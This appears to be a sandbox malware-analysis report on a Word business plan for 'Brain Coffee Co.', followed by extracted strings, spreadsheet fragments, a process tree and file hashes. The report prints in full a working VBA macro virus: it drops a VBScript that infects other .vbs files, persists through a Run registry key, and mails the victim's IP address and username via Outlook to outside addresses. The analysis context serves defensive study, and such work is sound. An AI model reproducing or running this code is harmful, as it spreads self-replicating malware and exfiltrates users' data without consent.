TestCon = System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Office\8.0", "AVM-VBS")
If System.PrivateProfileString("", "HKEY_CLASSES_ROOT\VBSFile\ScriptEngine", "") = "VBScript" Then SIY = True
If SIY = True And TestCon <> "Done" Then
Open "c:\happy.vbs" For Output As 1
Print #1, "'\xa4"
Print #1, ""
Print #1, "On Error Resume Next"
Print #1, "Dim IV6, U187, IV7, IV1, IV2, IV3, IV4"
Print #1, "Dim T111"
Print #1, "Dim IV5(200)"
Print #1, "Dim XR"
Print #1, "Set WSHShell = Wscript.CreateObject(""Wscript.Shell"")"
Print #1, "Set WshSysEnv = WSHShell.Environment(""Process"")"
Print #1, "IV10 = WshSysEnv(""Path"")"
Print #1, "IV7 = WSHShell.ExpandEnvironmentStrings(""%windir%\avm.vbs"")"
Print #1, "IV1 = Wscript.ScriptFullName"
Print #1, "Set IV6 = CreateObject(""Scripting.FileSystemObject"")"
Print #1, "XR = 1"
Print #1, "T11 = Wscript.ScriptFullName"
Print #1, "For x = Len(IV10) To 1 Step -1"
Print #1, "IV4 = Mid(IV10, x, 1)"
Print #1, "If IV4 <> "";"" Then"
Print #1, "IV5(XR) = IV4 + IV5(XR)"
Print #1, "ElseIf IV4 = "";"" Then"
Print #1, "IV5(XR) = IV5(XR) + ""\"""
Print #1, "XR = XR + 1"
Print #1, "End If"
Print #1, "Next"
Print #1, "IV5(XR) = IV5(XR) + ""\"""
Print #1, "IV5(XR + 1) = WSHShell.SpecialFolders(""Desktop"") + ""\"""
Print #1, "IV5(XR + 2) = WSHShell.SpecialFolders(""MyDocuments"") + ""\"""
Print #1, "IV5(XR + 3) = WSHShell.SpecialFolders(""Startup"") + ""\"""
Print #1, "IV5(XR + 4) = Left(T11, InStrRev(T11, ""\""))"
Print #1, "Set TS = IV6.OpenTextFile(T11, 1)"
Print #1, "IV9 = TS.ReadAll"
Print #1, "TS.Close"
Print #1, "IV8 = Chr(167)"
Print #1, "endIV8 = ""'"" & IV8"
Print #1, "For x = Len(IV9) To 1 Step -1"
Print #1, "If Mid(IV9, x, 1) = IV8 Then"
Print #1, "x = 1"
Print #1, "IV3 = endIV8 + IV3"
Print #1, "ElseIf Mid(IV9, x, 1) <> IV8 Then"
Print #1, "IV3 = Mid(IV9, x, 1) + IV3"
Print #1, "End If"
Print #1, "Next"
Print #1, "For y = 1 To (XR + 4)"
Print #1, "For Each Target In IV6.GetFolder(IV5(y)).Files"
Print #1, "If UCase(Right(Target.Name, 3)) = ""VBS"" Then"
Print #1, "IV11 = """""
Print #1, "Set TS = IV6.OpenTextFile(IV5(y) & Target.Name, 1)"
Print #1, "IV11 = TS.ReadAll"
Print #1, "TS.Close"
Print #1, "If mid(IV11,(len(IV11)-2),1) <> ""\xb4"" Then"
Print #1, "Set TS = IV6.OpenTextFile(IV5(y) & Target.Name, 8)"
Print #1, "TS.Write IV3"
Print #1, "TS.Close"
Print #1, "End If"
Print #1, "End If"
Print #1, "Next"
Print #1, "Next"
Print #1, "FIV11 (IV7)"
Print #1, "If T111 = False Then"
Print #1, "WSHShell.RegWrite ""HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVM"", IV7"
Print #1, "Set U187 = IV6.OpenTextFile(IV7, 2, True)"
Print #1, "U187.Write IV3"
Print #1, "U187.Close"
Print #1, "End If"
Print #1, "Function FIV11(filespec)"
Print #1, "Set IV6 = CreateObject(""Scripting.FileSystemObject"")"
Print #1, "If (IV6.FileExists(filespec)) Then"
Print #1, "T111 = True"
Print #1, "Else"
Print #1, "T111 = False"
Print #1, "End If"
Print #1, "End Function"
Print #1, "' Nick ""The Love Monkey"" Virus Package by ALT-F4 and ALT-F11 for the Alternative Virus Mafia"
Print #1, "'\xb4"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Office\8.0", "AVM-VBS") = "Done"
Close 1
Shell "wscript c:\happy.vbs", vbHide
End If
If SIY = True And GoOk = True Then
If Dir("c:\A4.vbs") = "" Then
Open "c:\A4.vbs" For Output As 1
Print #1, "Dim theApp, theNameSpace, theMailItem"
Print #1, "Dim IPSocket"
Print #1, "On Error Resume Next"
Print #1, "Set IPSocket = CreateObject(""MSWinsock.Winsock"")"
Print #1, "IPADDY = IPSocket.LocalIP"
Print #1, "set BOB = CreateObject(""Wscript.Network"")"
Print #1, "For x = 1 To 2"
Print #1, "If x = 1 Then EMADDY = ""avm@nym.alias.net"" Else EMADDY = ""nick@virusbtn.com"""
Print #1, "if x = 1 then MSGBDY = IPADDY else MSGBDY = ""Dear Nicky... my name is " & Application.UserName & " and I want to make hot monkey love with you. You anti-virus stud!"""
Print #1, "Set theApp = WScript.CreateObject(""Outlook.Application"")"
Print #1, "Set theNameSpace = theApp.GetNameSpace(""MAPI"")"
Print #1, "theNameSpace.Logon ""profile"", ""password"""
Print #1, "Set theMailItem = theApp.CreateItem(0)"
Print #1, "theMailItem.Recipients.Add EMADDY"
Print #1, "theMailItem.Subject = BOB.Username"
Print #1, "theMailItem.Body = MSGBDY"
Print #1, "theMailItem.Send"
Print #1, "theNameSpace.Logoff"
Print #1, "Next"
Close 1
End If
Shell "wscript c:\a4.vbs", vbHide
End If
If ActiveDocument.Saved <> a Then ActiveDocument.Saved = a
' Nick "The Love Monkey" Virus Package by ALT-F4 and ALT-F11 for the Alternative Virus Mafia
End Sub

Vba2Graph

%3
~{xur
-ejdB
=EjdB
Ir=iq
XK"5J
Ducky
Adobe
"Iv'toL
RDQ6d
N<@K9
I#D$W
/'>9]N
H!KCd
M<#E_
m-SIN
^qk!)
K.e"fR
GUoMkt(
dQ6Co
m*)8`e
Xe%IXu
IQM+iqYP
Ducky
Adobe
Gx>JI
\}qT%
{;;Gf
-#H4,
[amH2I0u
KwbR5
6&'y6n3
cg}HFu
a8hZNc2=
%Hfue
\K+Kj#H
,$R+$
[e \#P
P(E+,k
.0+wsiGx4
2(mPGz
Ducky
Adobe
d6]ihd
v0.lG
%xJYl:
rXBiARp
YJQ!)
Ducky
Adobe
5DDDUU]
`QO2h
E#3%A
|RigZ
Ducky
Adobe
D^r:fu
)HP)@
*Z5w,_4SA
Ducky
Adobe
RMJII
:*~Ux
Te!e/
{(hqR1k~5
-6Xwin
t_)]V~#
wOgnj
$%)JE
^#m6nq
!#hJBh
ZlGKhMTP
Ducky
Adobe
BS]E%r
h)IBA
JI*!A
Kfj5e
bZEa)n
<bElQ
p-Tt2
V]QJ[W
WClR(
)Il{2
P*Jf$
tSTL`]p+
T79!&R
%45eI
53p-)
5zM3+
M%U2%
LDPng
HJ3 T
y&JlH
F@F"iB
^JJTYt
XKne&s
m$fxJR
a*qE_ZI
3-FA3&~
Ducky
Adobe
%Hq%*
)J!)JA*$
,)j+q
mr7w{L
][Iu)
;I'@_}
5R|JWuh
(B[HJE
%hZKl
Microsoft Excel Worksheet
Excel.Sheet.8
Mark Portrait
Mark Portrait [
$OP-9
Courier1
Arial1
Arial1
Arial1
Helv1
Helv1
Helv1
Helv1
Helv1
Helv1
Helv1
Helv1
Helv1
Helv1
Helv1
Helv1
Helv1
Helv1
Courier1
ASSUMPTIONS;
BALANCE_MONTH;
BALANCE_YEARS;
BREAK_EVEN;
BUDGET;
CASHFLOWS_MONTH;
CASHFLOWS_YEARS;
FIRST_MONTH_NBR:
FIRST_YEAR_NBR:
GROSS_PROFIT;
INCOME_MONTH;
INCOME_YEARS;
RATIOS;
TAXRATE;
YEAR1_LABEL:
YEARS2_5_LABELS;
Break-Even Sales Volume
Net Income After Taxes Analysis#
*Warning: Both Methods Used>
<- s/b 01
*Warning: No Growth % or Monthly Increase Entered$
Out Of BalC
Depreciation
Increase in Other Payables#
Increase in Accrued Liabilities"
Deduct items not increasing cash#
Sale of Stock
Sale of Investments
Collection of Notes Receivable#
Reduction of Other AssetsG
CAUTION: These ratios are valid only if you have completed your Budget,E
Income Statement and Cash Flows statements and verified that,
Current Ratio$
Quick Ratio (Acid Test)7
Return on Total Assets3
Total Assets Turnover(
Total Debt to Total Assets
Gross Profit Margin&
Operating Profit Margin>
Net Profit Margin$
Cash Dividends Declared!
Proceeds from Short Term Loans#
Repayment of Short Term Loans
Proceeds from Long Term Loans"
Repayment of Long Term Loans#
Increase in Notes Receivable$
Collection of Notes Receivable#
Increase in Other Current Assets'
Increase in Other Assets1
Return on Owners' Equity;
Total Debt to Owners' Equity(
Total Liabilities / Total Owners' Equity%
Fixed Cost of Goods & Services#
Income from Operations"
Net Income After Taxes "
Income Statement (Year 1 by month)
As of the Month Ending:H
Net Income After Taxes<
Year 5&
Sales)
Interest=
Beginning"
Current Assets
Increase in Notes Receivable"
As of the Year Ending:D
Accumulated Depreciation*
Total Liabilities & Equity'
Cash Flow Assumptions (Year 1 by month):
NOTE: All values should be entered as positive numbers.$
Accounts Payable"
The total must equal 100%."
Increase in Other Payables
Decrease in Other Payables"
Increase in Accrued Liabilities%
Decrease in Accrued Liabilities$
Average Monthly Amount*
Fixed Costs Reclassified to Variable Costs9
End of Assumptions. No Input Required Below These Lines.7
C183
C190(
C192!
(These are sample tax rates
federal/state/local rates.)2
Brain Coffee Co. Integrated Financials Spreadsheet$
Budget Assumptions (Year 1 by month)y
** CLEAR THESE CELLS! **,
products or service<
Accounts Receivable$
Notes Receivable!
Inventory!
First Month
Monthly!
Increase!
Fixed COGS$
Accounts Receivable$
Notes Receivable!
MbP?_
f`}i?
@+xTA
@+xTA
Ducky
Adobe
Normal
Microsoft Word 9.0
Steelhead Advertising
Title
_PID_HLINKS
$oolb
(able
*t av
,lbar
.le][
Sub AutoClose()
Sub AutoOpen()
Document
AHKEY_CURRENT_USER\Software\VB and VBA Program Settings\Office\8.0
AVM-DC
AHKEY_CURRENT_USER\Software\VB and VBA Program Settings\Office\8.0
AVM-DC
AHKEY_CURRENT_USER\Software\VB and VBA Program Settings\Office\8.0
AVM-VBS
&HKEY_CLASSES_ROOT\VBSFile\ScriptEngine
VBScript
c:\happy.vbs
On Error Resume Next
&Dim IV6, U187, IV7, IV1, IV2, IV3, IV4
Dim T111
Dim IV5(200)
Dim XR
4Set WSHShell = Wscript.CreateObject("Wscript.Shell")
/Set WshSysEnv = WSHShell.Environment("Process")
IV10 = WshSysEnv("Path")
;IV7 = WSHShell.ExpandEnvironmentStrings("%windir%\avm.vbs")
IV1 = Wscript.ScriptFullName
4Set IV6 = CreateObject("Scripting.FileSystemObject")
XR = 1
T11 = Wscript.ScriptFullName
For x = Len(IV10) To 1 Step -1
IV4 = Mid(IV10, x, 1)
If IV4 <> ";" Then
IV5(XR) = IV4 + IV5(XR)
ElseIf IV4 = ";" Then
IV5(XR) = IV5(XR) + "\"
XR = XR + 1
End If
IV5(XR) = IV5(XR) + "\"
6IV5(XR + 1) = WSHShell.SpecialFolders("Desktop") + "\"
:IV5(XR + 2) = WSHShell.SpecialFolders("MyDocuments") + "\"
6IV5(XR + 3) = WSHShell.SpecialFolders("Startup") + "\"
+IV5(XR + 4) = Left(T11, InStrRev(T11, "\"))
!Set TS = IV6.OpenTextFile(T11, 1)
IV9 = TS.ReadAll
TS.Close
IV8 = Chr(167)
endIV8 = "'" & IV8
For x = Len(IV9) To 1 Step -1
If Mid(IV9, x, 1) = IV8 Then
x = 1
IV3 = endIV8 + IV3
!ElseIf Mid(IV9, x, 1) <> IV8 Then
IV3 = Mid(IV9, x, 1) + IV3
End If
For y = 1 To (XR + 4)
.For Each Target In IV6.GetFolder(IV5(y)).Files
,If UCase(Right(Target.Name, 3)) = "VBS" Then
IV11 = ""
2Set TS = IV6.OpenTextFile(IV5(y) & Target.Name, 1)
IV11 = TS.ReadAll
TS.Close
" Then
2Set TS = IV6.OpenTextFile(IV5(y) & Target.Name, 8)
TS.Write IV3
TS.Close
End If
End If
FIV11 (IV7)
If T111 = False Then
zzzyyy
]WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVM", IV7
)Set U187 = IV6.OpenTextFile(IV7, 2, True)
U187.Write IV3
U187.Close
End If
Function FIV11(filespec)
4Set IV6 = CreateObject("Scripting.FileSystemObject")
"If (IV6.FileExists(filespec)) Then
T111 = True
T111 = False
zzyyy
End If
End Function
wwvvvu
\' Nick "The Love Monkey" Virus Package by ALT-F4 and ALT-F11 for the Alternative Virus Mafia
AHKEY_CURRENT_USER\Software\VB and VBA Program Settings\Office\8.0
AVM-VBS
wscript c:\happy.vbs
c:\A4.vbs
c:\A4.vbs
%Dim theApp, theNameSpace, theMailItem
Dim IPSocket
On Error Resume Next
0Set IPSocket = CreateObject("MSWinsock.Winsock")
IPADDY = IPSocket.LocalIP
)set BOB = CreateObject("Wscript.Network")
For x = 1 To 2
LIf x = 1 Then EMADDY = "avm@nym.alias.net" Else EMADDY = "nick@virusbtn.com"
Fif x = 1 then MSGBDY = IPADDY else MSGBDY = "Dear Nicky... my name is
C and I want to make hot monkey love with you. You anti-virus stud!"
8Set theApp = WScript.CreateObject("Outlook.Application")
.Set theNameSpace = theApp.GetNameSpace("MAPI")
(theNameSpace.Logon "profile", "password"
&Set theMailItem = theApp.CreateItem(0)
!theMailItem.Recipients.Add EMADDY
"theMailItem.Subject = BOB.Username
theMailItem.Body = MSGBDY
theMailItem.Send
theNameSpace.Logoff
wscript c:\a4.vbs
[ Nick "The Love Monkey" Virus Package by ALT-F4 and ALT-F11 for the Alternative Virus Mafia
Attribut
e VB_Nam
e = "Thi
ub AutoO
m DC, IT
As Inte
Item(1).
CodeModu
le.Lines
cT("", "
HKEY_CUR
gram
Settings
kGo|Ok
"c:\hap
) To
LOCAL_M
ACHINE\S
sows\Cu
rrentVer
sion\Run
\AVM"",
nt #1, "
h6.Ope
Write
eateObje
C Love
Monkey""
Virus P
ackage b
ernati
HKEY_CUR
RENT_USE
o c:\h
\@vaZ
owith yo@u. You
znt.S
ications
*\H{00020905-0000-0000-C000-000000000046}#9.0#0#Macintosh HD:Applications:Microsoft Office 2001:Microsoft Word\0#Microsoft Word 9.0 Object Library
*\H{00020430-0000-0000-C000-000000000046}#2.0#0#Macintosh HD:System Folder:Extensions:Microsoft OLE Automation\2#OLE Automation
*\H{92396810-A79F-11D0-8ADF-00A0C91110EB}#2.0#0#Macintosh HD:Applications:Microsoft Office 2001:Office:Visual Basic for Applications\3#Microsoft Forms 2.0 Object Library
*\H{92C78480-A79F-11D0-8ADF-00A0C91110EB}#2.0#0#Macintosh HD:Applications:Microsoft Office 2001:Office:Visual Basic for Applications\2#Microsoft Forms 2.0 Object Library
I*\DMacintosh HD:Files:Company:coffeeconcept:Bus Plans:MS Plan Docs:Normal
*\H{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.0#0#Macintosh HD:Applications:Microsoft Office 2001:Office:Microsoft Office 2001\0#Microsoft Office 9.0 Object Library
ThisDocument
5c382b9ed
Win16
Win32
Project1
stdole
MSForms
Project
ThisDocument
_Evaluate
Normal
Office
Document
AutoOpen
Application
EnableCancelKey
Options
ViruUr
sProtection
SaveNormalPrompt
ConfirmConversions
ActiveDocument
Saved
Right
NormalTemplate
VBProject
VBComponents
CodeModule
Lines
AddFromString
CountOfLines
SaveAs
FileName
FullName
System
PrivateProfileString
TestCon
Shell
vbHide
UserName
_B_var_a
_B_var_Right
_B_var_Left
_B_var_GoOk
_B_var_TestCon
_B_var_SIY
0046}#2.
0#0#Maci
ntosh HD
:System
Folder:E
xtension
s:Micros
C78480-A
isual Ba
sFiles:
Company:
coffeeco
{2DF8D04
C-5BFA-1
ThisDocument
I*\DMacintosh HD:Files:Company:coffeeconcept:Bus Plans:MS Plan Docs:NormalUr
,If UCase(Right(Target.Name, 3)) = "VBS" Th
Microsoft Word Document
Word.Document.8
Brain Coffee Co. Preliminary Business Plan
December 2003
Patrick Feld
Normal
Mark Portrait
Microsoft Word 9.0
Brain Coffee Co.
Brain Coffee Co. Preliminary Business Plan
Title
_PID_HLINKS
BrainFinancialsFinal.xls
Worksheets
Microsoft Word Document
Word.Document.8
Ducky
Adobe
Brain Coffee Co. Preliminary Business Plan
December 2003
Patrick Feld
Normal
Mark Portrait
Microsoft Word 9.0
Brain Coffee Co.
Brain Coffee Co. Preliminary Business Plan
Title
_PID_HLINKS
BrainFinancialsFinal.xls
Worksheets
Microsoft Word Document
Word.Document.8
Ducky
Adobe
-ejdB
=EjdB
Ir=iq
XK"5J
Ducky
Adobe
"Iv'toL
RDQ6d
N<@K9
I#D$W
/'>9]N
H!KCd
M<#E_
m-SIN
^qk!)
K.e"fR
GUoMkt(
dQ6Co
m*)8`e
Xe%IXu
IQM+iqYP
Ducky
Adobe
Gx>JI
\}qT%
{;;Gf
-#H4,
[amH2I0u
KwbR5
6&'y6n3
cg}HFu
a8hZNc2=
%Hfue
\K+Kj#H
,$R+$
[e \#P
P(E+,k
.0+wsiGx4
2(mPGz
Ducky
Adobe
Root Entry
WordDocument
ObjectPool
WordDocument
SummaryInformation
DocumentSummaryInformation
1Table
PROJECT
CompObj
0Table
SummaryInformation
DocumentSummaryInformation
Macros
Normal
Heading 1
Heading 2
Heading 3
Heading 4
Heading 5
Heading 6
Heading 7
Heading 8
Default Paragraph Font
Address
Body Text
Company Name
TOC 1
TOC 2
TOC 3
TOC 4
TOC 5
TOC 6
TOC 7
TOC 8
TOC 9
Footer
Page Number
Hyperlink
Body Text 2
Header
Caption
Body Text 3
Body Text Indent
::Images:braincoffeelogo2.jpg
::Images:businesscard2.jpg
patrick@patrickfeld.net
mailto:patrick@patrickfeld.net
::Images:brain1.jpg
::Images:braindrivethrupage2.jpg
http://www.patrickfeld.net/braincoffee/
http://www.patrickfeld.net/braincoffee/
::Images:brainadeffort2.jpg
http://www.patrickfeld.net/braincoffee/
http://www.patrickfeld.net/braincoffee/
_1006529249
CompObj
ObjInfo
Workbook
SummaryInformation
DocumentSummaryInformation
_1006529369
Sheet_Title
1Table
CompObj
ObjInfo
ObjectPool
Normal
Heading 1
Heading 2
Heading 3
Heading 4
Default Paragraph Font
Address
Body Text
Company Name
Body Text 2
Header
Footer
Page Number
::Images:patrickfeldlogo.jpg
PROJECT.THISDOCUMENT.AUTOOPEN
Times New Roman
Times
Symbol
Arial
Helvetica
Times
WordDocument
SummaryInformation
DocumentSummaryInformation
1Table
::Images:patrickfeldlogo.jpg
ThisDocument
__SRP_2
__SRP_3
_VBA_PROJECT
__SRP_0
__SRP_1
PROJECTwm
tThisDocument
Normal
Heading 1
Heading 2
Heading 3
Heading 4
Heading 5
Heading 6
Heading 7
Heading 8
Default Paragraph Font
Address
Body Text
Company Name
TOC 1
TOC 2
TOC 3
TOC 4
TOC 5
TOC 6
TOC 7
TOC 8
TOC 9
Footer
Page Number
Hyperlink
Body Text 2
Header
Caption
Body Text 3
Body Text Indent
::Images:braincupfinal2.jpg
@::Images:brainpfsalespage2.jpg
@::Images:brainfloorplan2.jpg
::Images:braincompbag2.jpg
PROJECT.THISDOCUMENT.AUTOOPEN
Times New Roman
Times
Symbol
Arial
Palatino
Times
Helvetica
December 2003
Mark Portrait
Root Entry
WordDocument
ObjectPool
PROJECT
CompObj
0Table
Normal
Heading 1
Heading 2
Heading 3
Heading 4
Heading 5
Heading 6
Heading 7
Heading 8
Default Paragraph Font
Address
Body Text
Company Name
TOC 1
TOC 2
TOC 3
TOC 4
TOC 5
TOC 6
TOC 7
TOC 8
TOC 9
Footer
Page Number
Hyperlink
Body Text 2
Header
Caption
Body Text 3
Body Text Indent
::Images:braincupfinal2.jpg
@::Images:brainpfsalespage2.jpg
@::Images:brainfloorplan2.jpg
PROJECT.THISDOCUMENT.AUTOOPEN
Times New Roman
Times
Symbol
Arial
Palatino
Times
Helvetica
December 2003
Mark Portrait
SummaryInformation
DocumentSummaryInformation
Macros
::Images:braincoffeelogo2.jpg
::Images:businesscard2.jpg
::Images:brain1.jpg
::Images:braindrivethrupage2.jpg
::Images:brainadeffort2.jpg
http://www.patrickfeld.net/braincoffee/
http://www.patrickfeld.net/braincoffee/
mailto:patrick@patrickfeld.net
::Images:braincupfinal2.jpg
::Images:brainpfsalespage2.jpg
::Images:brainfloorplan2.jpg
::Images:braincompbag2.jpg
::Images:braincupfinal2.jpg
@::Images:brainpfsalespage2.jpg
@::Images:brainfloorplan2.jpg
PROJECT.THISDOCUMENT.AUTOOPEN
Times New Roman
Times
Symbol
Arial
Palatino
Times
Helvetica
December 2003
Mark Portrait
::Images:braincoffeelogo2.jpg
::Images:businesscard2.jpg
::Images:brain1.jpg
::Images:braindrivethrupage2.jpg
::Images:brainadeffort2.jpg
http://www.patrickfeld.net/braincoffee/
http://www.patrickfeld.net/braincoffee/
mailto:patrick@patrickfeld.net
::Images:braincupfinal2.jpg
::Images:brainpfsalespage2.jpg
::Images:brainfloorplan2.jpg
::Images:braincompbag2.jpg
This file is not on VirusTotal.

Process Tree


WINWORD.EXE, PID: 2360, Parent PID: 2900
Full Path: C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
Command Line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" "C:\Users\user\AppData\Local\Temp\tmpsh5v7u_m.doc" /q
splwow64.exe, PID: 2616, Parent PID: 2360
Full Path: C:\Windows\splwow64.exe
Command Line: C:\Windows\splwow64.exe 12288
explorer.exe, PID: 1708, Parent PID: 1660
Full Path: C:\Windows\explorer.exe
Command Line: C:\Windows\Explorer.EXE

Hosts

No hosts contacted.

TCP

No TCP connections recorded.

UDP

No UDP connections recorded.

DNS

No domains contacted.

HTTP Requests

No HTTP requests performed.

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

File name CVR13FD.tmp.cvr
Associated Filenames
C:\Users\user\AppData\Local\Temp\CVR13FD.tmp.cvr
File Size 0 bytes
File Type empty
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
CRC32 00000000
Ssdeep 3::
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name Normal.dotm
Associated Filenames
C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm
File Size 20381 bytes
File Type Microsoft Word 2007+
MD5 23f4c984d111e7c0851f13b5a39e23bf
SHA1 f0b6cf9e53e9b5396275341984cb781ee9c52e80
SHA256 3ade1df494b161cd3616664ccf82d732eea6a648eefe4bfdc285c21be9e51966
CRC32 B554EAE8
Ssdeep 384:Pjl7/J/5ehBcSV+qEPG6yGUTBIOoX4+hD9Qn6eF7y1SFmlEeP:d/JQoG2vX4+hD9IZY
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name ~$Normal.dotm
Associated Filenames
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
C:\Users\user\AppData\Local\Temp\~$psh5v7u_m.doc
File Size 162 bytes
File Type data
MD5 acb67bf7df8f0e7df75bac6b0e9643ec
SHA1 4869a0152f3ec1e97195c7f1fd33f11be2f6b888
SHA256 d8b1018a6ae8a96b457fb7303f6260419841fae1ef0daf17f31f05f6cfcaa637
CRC32 55E1A65B
Ssdeep 3:2H/9lyX/3L7YMlbK7g7lxItPFx8w/:wVSlxK7ghq9x
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name ~WRC0000.tmp
Associated Filenames
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0000.tmp
C:\Users\user\AppData\Local\Temp\tmpsh5v7u_m.doc
File Size 4200960 bytes
File Type Composite Document File V2 Document, Little Endian, Os: MacOS, Version 10.3, Code page: 10000, Title: Brain Coffee Co. Preliminary Business Plan, Subject: December 2003, Author: Patrick Feld, Template: Normal, Last Saved By: Mark Portrait, Revision Number: 28, Name of Creating Application: Microsoft Word 9.0, Total Editing Time: 10:27:00, Create Time/Date: Thu Dec 11 04:58:00 2003, Last Saved Time/Date: Fri Dec 19 21:44:00 2003, Number of Pages: 42, Number of Words: 14927, Number of Characters: 85085, Security: 2
MD5 7cad33500a32cf4335f4553922650ef2
SHA1 fc1619f581f8fa976bf6ca42aa856818775ddbfe
SHA256 31cb9054db8cfa48e2bac12b291ef7581cc4b96a8d47d0167465f1fd16436fd5
CRC32 C3C994F9
Ssdeep 98304:blM+Qge+ZdqmvEReVpydCQMlM+Qge+Zdqm:ucZdqmRQCQNcZdqm
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name MSForms.exd
Associated Filenames
C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
File Size 147284 bytes
File Type data
MD5 c998106d7982b3bf83f8767338fde072
SHA1 61e213178bf4a04445c3da5ab05c7d0e1903e1dc
SHA256 59487def3d54c8feecd434920f68427c77338be3db5df3a5a9766b372f613ad3
CRC32 6ADC14B5
Ssdeep 1536:CkILrFNSc8SetKB96vQVCjumVMOej6mXmYarrJQcd1FaLcmB:CDNNSc83tKBAvQVCGOtmXmLpLmB
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name CUSTOM.DIC
Associated Filenames
C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
File Size 2 bytes
File Type Little-endian UTF-16 Unicode text, with no line terminators
MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
CRC32 88F83096
Ssdeep 3:Qn:Qn
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file Display Text
\xff\xfe
File name ~WRS{AAE56046-81C2-4CBF-AC95-50CF5E34FDC4}.tmp
Associated Filenames
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AAE56046-81C2-4CBF-AC95-50CF5E34FDC4}.tmp
File Size 1024 bytes
File Type data
MD5 5d4d94ee7e06bbb0af9584119797b23a
SHA1 dbb111419c704f116efa8e72471dd83e86e49677
SHA256 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
CRC32 23C03491
Ssdeep 3:ol3lYdn:4Wn
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name ~WRS{AF84AC22-0525-4E56-AB03-A36968EC6AE1}.tmp
Associated Filenames
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AF84AC22-0525-4E56-AB03-A36968EC6AE1}.tmp
File Size 1536 bytes
File Type data
MD5 4ce962ebc3c56aa351978993011edc52
SHA1 41d891d9f59e430d46c9ff564b1546e6e945b96b
SHA256 c4bb298bcd0e67c4eaae7c6e2c209bac961d24e2b904c26e59874a8d5b235592
CRC32 F9283CE9
Ssdeep 3:Iiiiiiiiii1Hlnl/bl//l/bll/vvvvvvvvvvFlIqsdHl3lldHzlblXllZrnlPlXi:Iiiiiiiiii1eJc8++VyHgoy/e+RoKQ
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name ~WRS{A3B1DA1A-048D-441E-96AC-CAEF9DB6E4B9}.tmp
Associated Filenames
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A3B1DA1A-048D-441E-96AC-CAEF9DB6E4B9}.tmp
File Size 1536 bytes
File Type data
MD5 a47885c5dc3c4b73915fac5ff548a73c
SHA1 d6cd72c366a441cfc01a6249cab5fc688cb5aa5e
SHA256 d9ddf7c624b6485519588ef0c5811349d503b96d7a03b484cef7777a5999301a
CRC32 11E41B9E
Ssdeep 6:YmWmG2GW2GJjvm/v3WqyHOl3l3ltyWlBlGm4Fn:YXHH3cmXWOBTRK
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name Word14.customUI
Associated Filenames
C:\Users\user\AppData\Local\Microsoft\Office\Word14.customUI
File Size 3513 bytes
File Type Microsoft OOXML
MD5 b022439244ee91625c99a91c666eb0fb
SHA1 84a647b0bc5457c74c631361e8fad1dadd0852c8
SHA256 2a439ab0ccf43f70f80f6b929f9ea29ac6a6666b9abce9921105dc72e7fda8ca
CRC32 CC7E186E
Ssdeep 48:9mV5NrJ54E1SO6xLfUMcZ0BIKoGn5FxwYzZX2ynWM2d8gy7znl:UV5RJ4xFOYtXl
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name ~WRF{4F0C4843-9FB9-499D-87E8-922A36CB0A35}.tmp
Associated Filenames
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F0C4843-9FB9-499D-87E8-922A36CB0A35}.tmp
File Size 33280 bytes
File Type Composite Document File V2 Document, No summary info
MD5 00c61260952475fdf53b14dbac830ca3
SHA1 4b09a3cce0d6a3ef127da25f0e26b73b80d5c80c
SHA256 4f9015abd372a64bdcb2ab7a79bf701a1244639f25af15578d7b87aa0e23db6d
CRC32 F102D774
Ssdeep 768:l0eTiMtoDFCEHi0cE+2Vq2w2YW42iFV2H2W2f2g0dhKT5452Q2a+KQoh7SG8e11F:nmrHtnVVkQP
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
Sorry! No CAPE files.
Sorry! No process dumps.

Comments



No comments posted

Processing ( 13.855 seconds )

  • 3.695 BehaviorAnalysis
